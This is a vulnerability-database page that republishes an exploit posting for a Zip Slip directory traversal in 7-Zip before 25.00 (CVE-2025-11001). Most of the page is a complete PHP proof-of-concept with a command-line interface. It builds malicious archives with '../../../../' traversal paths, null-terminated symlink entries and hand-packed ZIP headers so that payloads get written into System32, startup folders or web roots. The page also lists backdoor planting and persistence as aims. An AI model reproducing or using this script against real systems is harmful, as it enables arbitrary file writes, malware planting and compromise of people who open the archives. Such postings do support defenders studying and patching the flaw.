Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

๐Ÿ“„ 7-Zip 25.00 Zip Slip Directory Traversal

๐Ÿ—“๏ธย 26 Nov 2025ย 00:00:00Reported byย indoushkaTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 169ย Views

7-Zip before 25.00 has Zip Slip with traversal and symlink, null-byte truncation enabling writes.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for CVE-2025-11001
20 Nov 202504:16
โ€“githubexploit
GithubExploit		Exploit for CVE-2025-11001
22 Nov 202517:58
โ€“githubexploit
GithubExploit		Exploit for CVE-2025-11001
24 Nov 202513:55
โ€“githubexploit
GithubExploit		Exploit for CVE-2025-11001
14 Oct 202509:25
โ€“githubexploit
GithubExploit		Exploit for Path Traversal in 7-Zip
12 Dec 202516:49
โ€“githubexploit
GithubExploit		Exploit for CVE-2025-11001
15 Oct 202512:14
โ€“githubexploit
GithubExploit		Exploit for CVE-2025-11001
22 Nov 202510:13
โ€“githubexploit
Tenable Nessus		7-Zip < 25.00
23 Jul 202500:00
โ€“nessus
Tenable Nessus		Amazon Linux 2023 : p7zip, p7zip-plugins (ALAS2023-2025-1250)
28 Oct 202500:00
โ€“nessus
Tenable Nessus		Amazon Linux 2023 : 7zip, 7zip-reduced, 7zip-standalone (ALAS2023-2025-1251)
28 Oct 202500:00
โ€“nessus
Rows per page
=============================================================================================================================================
    | # Title     : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability                                                              |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.7-zip.org/                                                                                                      |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001 
    
    [+] Summary :
    
    Multiple archive extraction implementations, including 7โ€‘Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
    An attacker can craft a malicious ZIP archive containing:
    
    Directory traversal sequences (../../../)
    
    Symlink entries
    
    Manipulated extra fields
    
    Nullโ€‘byte terminated link targets
    
    This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.
    
    [+] Vulnerability Class :
    
    Directory Traversal
    
    Arbitrary File Write
    
    Symlink Path Injection
    
    Null-byte truncation bug
    
    [+]  Affected Software :
    
    7โ€‘Zip < 25.00 (Administrator-only exploitation on Windows)
    
    Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)
    
    Applications that use ZipArchive without proper sanitization
    
    [+] Impact
    
    A malicious ZIP archive allows an attacker to place files in arbitrary locations such as
    
    C:\Windows\System32\
    C:\ProgramData\Microsoft\Windows\Start Menu\
    /etc/
    /var/www/html/
    
    
    [+] Possible consequences:
    
        Backdoor planting
    
        Privilege escalation
    
        Persistence via startup folders
    
        Overwriting sensitive files
    
        Gaining remote execution depending on file location created
    
    [+] Technical Details
    
    [+] Core Exploit Mechanism
    
    The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe
    
    or a symlink entry:  evil.lnk  โ†’  ../../../../Users/Public/Documents\0
    
    These paths bypass validators in 7โ€‘Zip and other ZIP extractors when running with elevated privileges.
    
    poc
    
    <?php
    /*
    ===========================================================
       By Indoushka (Nekaa Salah eddine)
    ===========================================================
    */
    
    /* ===========================================================
       MODE 1 โ€” Basic Zip Slip Exploit
       (Former: build_zip duplicated 4 times)
    =========================================================== */
    function poc_zip_slip($target_path, $payload_file, $output_zip)
    {
        if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }
    
        $payload_name = basename($payload_file);
        $payload_data = file_get_contents($payload_file);
    
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $traversal = "../../../../" . $target;
    
        $zip = new ZipArchive();
        if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
            die("[-] Failed to create ZIP\n");
        }
    
        $zip->addFromString($traversal . $payload_name, $payload_data);
        $zip->close();
    
        echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 2 โ€” Manual Symlink ZIP Creator
    =========================================================== */
    function poc_symlink_zip($target_path, $output_zip)
    {
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $traversal = "../../../../" . $target;
    
        $name = "evil.lnk";
        $link = $traversal . "\x00";
    
        $extra  = pack("v", 0x756e);
        $extra .= pack("v", strlen($link));
        $extra .= $link;
    
        $local = pack("VvvvvvVVVvv",
            0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,
            strlen($name), strlen($extra)
        );
    
        file_put_contents($output_zip, $local . $name . $extra);
    
        echo "[+] PoC: Symlink ZIP created: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 3 โ€” Full Manual ZIP Builder (Symlink + Payload)
    =========================================================== */
    function poc_manual_zip($target_path, $payload_file, $output_zip)
    {
        if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }
    
        $payload_name  = basename($payload_file);
        $payload_data  = file_get_contents($payload_file);
    
        $target = trim(str_replace("\\", "/", $target_path), "/") . "/";
        $trav   = "../../../../" . $target;
    
        $ln_name   = "evil.lnk";
        $ln_target = $trav . "\x00";
        $ln_extra  = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;
    
        $f = fopen($output_zip, "wb");
        $off = 0;
    
        // Local: Symlink
        $h1 = pack("VvvvvvVVVvv",
            0x04034b50,20,0x800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
        );
        fwrite($f, $h1.$ln_name.$ln_extra);
        $symlink_offset = $off;
        $off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);
    
        // Local: Payload
        $h2 = pack("VvvvvvVVVvv",
            0x04034b50,20,0x800,0,0,0,0,strlen($payload_data),strlen($payload_data),
            strlen($payload_name),0
        );
        fwrite($f, $h2.$payload_name.$payload_data);
        $payload_offset = $off;
        $off += strlen($h2)+strlen($payload_name)+strlen($payload_data);
    
        // Central Directory
        $cd_start = $off;
    
        // CD: Symlink
        $cd1 = pack("VvvvvvVVVvvvvvVV",
            0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
            strlen($ln_name),strlen($ln_extra),0,0,0,(0777<<16)|0xA1ED,$symlink_offset
        );
        fwrite($f, $cd1.$ln_name.$ln_extra);
    
        // CD: Payload
        $cd2 = pack("VvvvvvVVVvvvvvVV",
            0x02014b50,0x0317,20,0x800,0,0,0,0,
            strlen($payload_data),strlen($payload_data),
            strlen($payload_name),0,0,0,0,(0777<<16),$payload_offset
        );
        fwrite($f, $cd2.$payload_name);
    
        // EOCD
        $eocd = pack("VvvvvVVv",
            0x06054b50,0,0,2,2,$off,$cd_start,0
        );
        fwrite($f, $eocd);
        fclose($f);
    
        echo "[+] PoC: Manual ZIP generated: $output_zip\n";
    }
    
    
    /* ===========================================================
       MODE 4 โ€” CVEโ€‘2025โ€‘11001 (7-Zip Directory Traversal)
    =========================================================== */
    function poc_cve_2025_11001($target, $payload, $output)
    {
        poc_manual_zip($target, $payload, $output);
    
        echo "[+] CVE-2025-11001 Archive Ready\n";
    }
    
    
    /* ===========================================================
       CLI Controller
    =========================================================== */
    
    if (php_sapi_name() == "cli")
    {
        $args = getopt("", [
            "mode:",
            "target:",
            "payload::",
            "output::"
        ]);
    
        if (!isset($args["mode"])) {
            die("Usage:\n
    php exploit.php --mode=zip-slip     --target=DIR --payload=file --output=out.zip
    php exploit.php --mode=symlink      --target=DIR --output=out.zip
    php exploit.php --mode=manual       --target=DIR --payload=file --output=out.zip
    php exploit.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
    ");
        }
    
        $mode   = $args["mode"];
        $target = $args["target"] ?? null;
        $payload= $args["payload"] ?? null;
        $output = $args["output"] ?? "exploit.zip";
    
        switch ($mode) {
            case "zip-slip":
                poc_zip_slip($target, $payload, $output);
                break;
    
            case "symlink":
                poc_symlink_zip($target, $output);
                break;
    
            case "manual":
                poc_manual_zip($target, $payload, $output);
                break;
    
            case "cve-2025-11001":
                poc_cve_2025_11001($target, $payload, $output);
                break;
    
            default:
                echo "Unknown mode.\n";
        }
    }
    ?>
    
    
    Save as : poc.php
    
    run : php poc.php
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Nov 2025 00:00Current
7High risk
Vulners AI Score7
CVSS 3.17.8
CVSS 37
EPSS0.00258
SSVC
zip slipdirectory traversalsymlink injectionnull byte truncationarbitrary writeseven zip
169